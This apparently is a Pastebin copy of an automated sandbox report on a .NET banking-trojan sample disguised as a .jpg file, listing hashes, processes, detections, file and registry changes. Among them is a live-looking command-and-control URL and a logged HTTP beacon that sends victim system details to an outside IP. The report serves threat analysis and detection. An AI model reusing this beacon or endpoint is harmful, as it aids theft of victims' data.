paladin316

Exes_6f98b4a935d885219ef0d5e7a15d998d_jpg_2019-07-10_07_30.txt

Jul 10th, 2019
2,111
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.75 KB | None | 0 0
  1.  
  2. * MalFamily: "Msilperseus"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_6f98b4a935d885219ef0d5e7a15d998d.jpg"
  7. * File Size: 2961920
  8. * File Type: "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows"
  9. * SHA256: "497e19c344260eec3dab15d9adeb8ed034a456531981dc08750d5f5e419103c1"
  10. * MD5: "6f98b4a935d885219ef0d5e7a15d998d"
  11. * SHA1: "41db63689350a2cfdfd93d8fff02b47ef43e460f"
  12. * SHA512: "2935a2e23efe709d5ceb73f8586e11d0adfc809a98a7996330280024f6ad50ae2b1528b50ea31e6a81d875f4c320033469ad0a91a416cc61fb0fa220d30257a0"
  13. * CRC32: "1A44BBA1"
  14. * SSDEEP: "49152:u53wBOHQ0j5dZVlABGNR4mwpwNPocZV4HnIBemOnv8UfuX:wgBOHQkvXaPmdUIBnOnk4i"
  15.  
  16. * Process Execution:
  17. "Exes_6f98b4a935d885219ef0d5e7a15d998d.jpg",
  18. "vbc.exe",
  19. "cvtres.exe",
  20. "vbc.exe",
  21. "cvtres.exe",
  22. "svchost.exe",
  23. "WmiPrvSE.exe",
  24. "svchost.exe"
  25.  
  26.  
  27. * Executed Commands:
  28. "\"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\vbc.exe\" /noconfig @\"C:\\Users\\user\\AppData\\Local\\Temp\\raevqacy.cmdline\"",
  29. "\"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\vbc.exe\" /noconfig @\"C:\\Users\\user\\AppData\\Local\\Temp\\9tsihyb9.cmdline\"",
  30. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\user\\AppData\\Local\\Temp\\RES5844.tmp\" \"C:\\Users\\user\\AppData\\Local\\Temp\\vbc5843.tmp\"",
  31. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  32. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\user\\AppData\\Local\\Temp\\RES90D9.tmp\" \"C:\\Users\\user\\AppData\\Local\\Temp\\vbc90C8.tmp\""
  33.  
  34.  
  35. * Signatures Detected:
  36.  
  37. "Description": "Creates RWX memory",
  38. "Details":
  39.  
  40.  
  41. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  42. "Details":
  43.  
  44. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  45.  
  46.  
  47. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  48.  
  49.  
  50. "suspicious_request": "http://34.238.151.233/AZL2/PostaSatanas.php?plug=NAO&GBS=&SYS=Microsoft%20Windows%207%20Enterprise%20N%20&USERPC=user%20-%20Host&AVS=&NAV=chrome&ORI=1.3"
  51.  
  52.  
  53.  
  54.  
  55. "Description": "Performs some HTTP requests",
  56. "Details":
  57.  
  58. "url": "http://34.238.151.233/AZL2/PostaSatanas.php?plug=NAO&GBS=&SYS=Microsoft%20Windows%207%20Enterprise%20N%20&USERPC=user%20-%20Host&AVS=&NAV=chrome&ORI=1.3"
  59.  
  60.  
  61.  
  62.  
  63. "Description": "The binary likely contains encrypted or compressed data.",
  64. "Details":
  65.  
  66. "section": "name: .text, entropy: 7.72, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x0029e400, virtual_size: 0x0029e364"
  67.  
  68.  
  69. "section": "name: .rsrc, entropy: 6.98, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00034a00, virtual_size: 0x000349a5"
  70.  
  71.  
  72.  
  73.  
  74. "Description": "Sniffs keystrokes",
  75. "Details":
  76.  
  77. "SetWindowsHookExW": "Process: Exes_6f98b4a935d885219ef0d5e7a15d998d.jpg(1612)"
  78.  
  79.  
  80.  
  81.  
  82. "Description": "Retrieves Windows ProductID, probably to fingerprint the sandbox",
  83. "Details":
  84.  
  85.  
  86. "Description": "File has been identified by 18 Antiviruses on VirusTotal as malicious",
  87. "Details":
  88.  
  89. "MicroWorld-eScan": "Gen:Variant.MSILPerseus.151695"
  90.  
  91.  
  92. "McAfee": "Artemis!6F98B4A935D8"
  93.  
  94.  
  95. "Arcabit": "Trojan.MSILPerseus.D2508F"
  96.  
  97.  
  98. "Avast": "Win32:Malware-gen"
  99.  
  100.  
  101. "BitDefender": "Gen:Variant.MSILPerseus.151695"
  102.  
  103.  
  104. "Ad-Aware": "Gen:Variant.MSILPerseus.151695"
  105.  
  106.  
  107. "Emsisoft": "Gen:Variant.MSILPerseus.151695 (B)"
  108.  
  109.  
  110. "DrWeb": "Trojan.DownLoader29.34782"
  111.  
  112.  
  113. "McAfee-GW-Edition": "Artemis"
  114.  
  115.  
  116. "FireEye": "Gen:Variant.MSILPerseus.151695"
  117.  
  118.  
  119. "SentinelOne": "DFI - Suspicious PE"
  120.  
  121.  
  122. "MAX": "malware (ai score=82)"
  123.  
  124.  
  125. "Microsoft": "Trojan:Win32/Fuery.B!cl"
  126.  
  127.  
  128. "GData": "Gen:Variant.MSILPerseus.151695"
  129.  
  130.  
  131. "AhnLab-V3": "Malware/Win32.Generic.C1188165"
  132.  
  133.  
  134. "ALYac": "Gen:Variant.MSILPerseus.151695"
  135.  
  136.  
  137. "ESET-NOD32": "a variant of MSIL/Spy.Banker.ES"
  138.  
  139.  
  140. "AVG": "Win32:Malware-gen"
  141.  
  142.  
  143.  
  144.  
  145. "Description": "Collects information to fingerprint the system",
  146. "Details":
  147.  
  148.  
  149.  
  150. * Started Service:
  151.  
  152. * Mutexes:
  153. "Global\\CLR_CASOFF_MUTEX",
  154. "Global\\.net clr networking"
  155.  
  156.  
  157. * Modified Files:
  158. "C:\\Users\\user\\AppData\\Local\\GDIPFONTCACHEV1.DAT",
  159. "C:\\Users\\user\\AppData\\Local\\Temp\\raevqacy.tmp",
  160. "C:\\Users\\user\\AppData\\Local\\Temp\\raevqacy.0.vb",
  161. "C:\\Users\\user\\AppData\\Local\\Temp\\raevqacy.dll",
  162. "C:\\Users\\user\\AppData\\Local\\Temp\\raevqacy.cmdline",
  163. "C:\\Users\\user\\AppData\\Local\\Temp\\raevqacy.out",
  164. "C:\\Users\\user\\AppData\\Local\\Temp\\raevqacy.err",
  165. "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences",
  166. "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Local State",
  167. "C:\\Users\\user\\AppData\\Local\\Temp\\9tsihyb9.tmp",
  168. "C:\\Users\\user\\AppData\\Local\\Temp\\9tsihyb9.0.vb",
  169. "C:\\Users\\user\\AppData\\Local\\Temp\\9tsihyb9.dll",
  170. "C:\\Users\\user\\AppData\\Local\\Temp\\9tsihyb9.cmdline",
  171. "C:\\Users\\user\\AppData\\Local\\Temp\\9tsihyb9.out",
  172. "C:\\Users\\user\\AppData\\Local\\Temp\\9tsihyb9.err",
  173. "C:\\Users\\user\\AppData\\Local\\Temp\\vbc5843.tmp",
  174. "C:\\Users\\user\\AppData\\Local\\Temp\\RES5844.tmp",
  175. "\\??\\PIPE\\samr",
  176. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
  177. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
  178. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
  179. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
  180. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
  181. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
  182. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
  183. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  184. "\\??\\PIPE\\wkssvc",
  185. "\\??\\PIPE\\srvsvc",
  186. "C:\\Users\\user\\AppData\\Local\\Temp\\vbc90C8.tmp",
  187. "C:\\Users\\user\\AppData\\Local\\Temp\\RES90D9.tmp"
  188.  
  189.  
  190. * Deleted Files:
  191. "C:\\Users\\user\\AppData\\Local\\Temp\\raevqacy.cmdline",
  192. "C:\\Users\\user\\AppData\\Local\\Temp\\raevqacy.0.vb",
  193. "C:\\Users\\user\\AppData\\Local\\Temp\\raevqacy.out",
  194. "C:\\Users\\user\\AppData\\Local\\Temp\\raevqacy.pdb",
  195. "C:\\Users\\user\\AppData\\Local\\Temp\\raevqacy.err",
  196. "C:\\Users\\user\\AppData\\Local\\Temp\\raevqacy.tmp",
  197. "C:\\Users\\user\\AppData\\Local\\Temp\\raevqacy.dll",
  198. "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences",
  199. "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Local State",
  200. "C:\\Users\\user\\AppData\\Local\\Temp\\9tsihyb9.out",
  201. "C:\\Users\\user\\AppData\\Local\\Temp\\9tsihyb9.pdb",
  202. "C:\\Users\\user\\AppData\\Local\\Temp\\9tsihyb9.tmp",
  203. "C:\\Users\\user\\AppData\\Local\\Temp\\9tsihyb9.err",
  204. "C:\\Users\\user\\AppData\\Local\\Temp\\9tsihyb9.0.vb",
  205. "C:\\Users\\user\\AppData\\Local\\Temp\\9tsihyb9.dll",
  206. "C:\\Users\\user\\AppData\\Local\\Temp\\9tsihyb9.cmdline",
  207. "C:\\Users\\user\\AppData\\Local\\Temp\\RES5844.tmp",
  208. "C:\\Users\\user\\AppData\\Local\\Temp\\vbc5843.tmp",
  209. "C:\\Users\\user\\AppData\\Local\\Temp\\RES90D9.tmp",
  210. "C:\\Users\\user\\AppData\\Local\\Temp\\vbc90C8.tmp"
  211.  
  212.  
  213. * Modified Registry Keys:
  214. "HKEY_CURRENT_USER\\DWM",
  215. "HKEY_CURRENT_USER\\DWM\\COUNT",
  216. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\Exes_6f98b4a935d885219ef0d5e7a15d998d_RASAPI32",
  217. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\Exes_6f98b4a935d885219ef0d5e7a15d998d_RASAPI32\\EnableFileTracing",
  218. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\Exes_6f98b4a935d885219ef0d5e7a15d998d_RASAPI32\\EnableConsoleTracing",
  219. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\Exes_6f98b4a935d885219ef0d5e7a15d998d_RASAPI32\\FileTracingMask",
  220. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\Exes_6f98b4a935d885219ef0d5e7a15d998d_RASAPI32\\ConsoleTracingMask",
  221. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\Exes_6f98b4a935d885219ef0d5e7a15d998d_RASAPI32\\MaxFileSize",
  222. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\Exes_6f98b4a935d885219ef0d5e7a15d998d_RASAPI32\\FileDirectory",
  223. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
  224. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
  225. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
  226. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
  227. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
  228. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
  229. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
  230. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider"
  231.  
  232.  
  233. * Deleted Registry Keys:
  234.  
  235. * DNS Communications:
  236.  
  237. * Domains:
  238.  
  239. * Network Communication - ICMP:
  240.  
  241. * Network Communication - HTTP:
  242.  
  243. "count": 1,
  244. "body": "",
  245. "uri": "http://34.238.151.233/AZL2/PostaSatanas.php?plug=NAO&GBS=&SYS=Microsoft%20Windows%207%20Enterprise%20N%20&USERPC=user%20-%20Host&AVS=&NAV=chrome&ORI=1.3",
  246. "user-agent": "",
  247. "method": "GET",
  248. "host": "34.238.151.233",
  249. "version": "1.1",
  250. "path": "/AZL2/PostaSatanas.php?plug=NAO&GBS=&SYS=Microsoft%20Windows%207%20Enterprise%20N%20&USERPC=user%20-%20Host&AVS=&NAV=chrome&ORI=1.3",
  251. "data": "GET /AZL2/PostaSatanas.php?plug=NAO&GBS=&SYS=Microsoft%20Windows%207%20Enterprise%20N%20&USERPC=user%20-%20Host&AVS=&NAV=chrome&ORI=1.3 HTTP/1.1\r\nHost: 34.238.151.233\r\nConnection: Keep-Alive\r\n\r\n",
  252. "port": 80
  253.  
  254.  
  255.  
  256. * Network Communication - SMTP:
  257.  
  258. * Network Communication - Hosts:
  259.  
  260. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment